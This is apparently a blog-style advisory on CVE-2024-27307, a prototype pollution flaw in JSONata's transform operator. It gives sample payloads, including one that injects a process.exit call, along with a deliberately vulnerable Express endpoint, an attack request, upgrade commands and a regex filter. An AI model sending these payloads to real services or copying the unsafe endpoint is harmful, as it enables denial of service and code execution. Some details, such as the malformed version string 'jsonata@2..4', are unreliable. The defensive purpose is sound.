CVE-2024-27307 - Critical Remote Code Execution via JSONata Transform Operator Exploit

CVE-2024-27307 is a recent critical vulnerability discovered in JSONata, a popular JSON query and transformation language used widely in web applications and APIs. This long-read will break down the vulnerability, show how attackers could potentially exploit it, and—most importantly—how you can protect your apps. If you use JSONata to process user-supplied data, this affects you directly.

What Is JSONata?

JSONata allows developers to query, transform, and map JSON data using a powerful expression language. It is used as a safer, more declarative alternative to manual eval or JavaScript snippets.

Developers love JSONata because it is fast, extensible, and easy to embed into Node.js and browser-based apps. However, when evaluating user-supplied expressions, *security boundaries can be crossed* if proper safeguards are not in place.

Attack Vector: Untrusted JSONata expression input (especially user-provided!)

- Impact: Attacker can abuse the transform operator to *override* critical properties on JavaScript's global Object constructor and prototype.
- Potential Result: Denial of service (DoS), remote code execution (RCE), or unpredictable behavior in your app.

How The Attack Works

JSONata has a $transform operator that can manipulate objects. Due to insufficient sealing of the JSONata execution context, a malicious payload can use this operator to overwrite or redefine properties on the JavaScript Object.prototype. Because all objects inherit from this prototype, such an overwrite creates surprising and possibly dangerous results—including total application compromise.

Here’s a JSONata expression that demonstrates a malicious override

(
    $T := {
        "constructor.prototype.polluted": "PWNED!",
        "constructor.prototype.exec": function() { $eval("process.exit()") }
    };
    $transform({}, $T);
)

It sets a custom property polluted on ALL objects.

- It tries to define an exec function on the Object prototype, which, if called, runs arbitrary code (note: in JavaScript environments where $eval grants such access).

Even simpler, an attacker can poison the prototype chain with

$transform({}, {"constructor.prototype.infected": true})

Result: Every object in your app gains a property infected=true. That could crash logic, cause information exposure, or (with further chaining) escalate to full code execution.

Exploit Scenario

Suppose your API allows users to submit custom JSONata queries to transform or interrogate data. If you're running an affected version, an attacker submits the above expression.

Your application now behaves unpredictably or executes attacker-controlled commands.

If the environment allows arbitrary evaluation (e.g., via $eval or similar features), the attacker *may run remote code*—a total compromise.

Vulnerable Server (app.js)

const jsonata = require('jsonata');
const express = require('express');
const bodyParser = require('body-parser');

const app = express();
app.use(bodyParser.json());

app.post('/query', (req, res) => {
    const { data, expression } = req.body;
    try {
        const expr = jsonata(expression);
        const result = expr.evaluate(data);
        res.json({ result });
    } catch (e) {
        res.status(400).send(e.toString());
    }
});

app.listen(300, () => console.log('Listening on 300'));

Attack Payload

{
    "data": {},
    "expression": "$transform({}, {\"constructor.prototype.polluted\": true})"
}

Effect: Every subsequent request handled by the server will see the polluted property. Application logic relying on "clean" objects may break or leak secrets.

Denial of Service: Crash the application with unexpected object shapes or infinite loops.

- Remote Code Execution: If the execution context permits, attacker might run arbitrary JavaScript.
- Data Integrity Attacks: Compromise data transformations, inject false/inaccurate output, or poison internal logic.
- Escalating Attacks: Use initial pollution to piggy-back other JavaScript exploits (e.g. prototype pollution leading to more severe RCE).

Update your package.json and run

npm install jsonata@1.8.7
# or
npm install jsonata@2..4

MANUAL PATCH (Hotfix)

If you cannot upgrade immediately, you can manually backport the fix. Here is the official patch diff, or you can block malicious paths in your wrapper code; for example:

// Block expressions containing dangerous keys
function isSafe(expression) {
    return !/constructor\.prototype/i.test(expression);
}
// Before evaluating user expressions:
if (!isSafe(expression)) throw new Error('Unsafe JSONata expression detected!');

REFERENCES

- GitHub Security Advisory: GHSA-qrf2-p9f6-r4qw
- NPM Advisory Report
- Patched commit
- Official JSONata Releases

Stay Safe

Vulnerabilities like CVE-2024-27307 remind us that even small, trusted libraries can open big security holes when mixing code with data. Always keep dependencies up-to-date and audit any feature that evaluates user-supplied code or expressions.

Is your project affected? Share your story or questions below—let’s all help keep the web safe.


*This article is original content written for exclusive use on this platform. Sharing and referencing encouraged with credit!*


TL;DR: CVE-2024-27307 in JSONata lets attackers hijack your Node.js app via prototype pollution. UPDATE IMMEDIATELY.

Timeline

Published on: 03/06/2024 20:15:47 UTC
Last modified on: 03/06/2024 21:42:48 UTC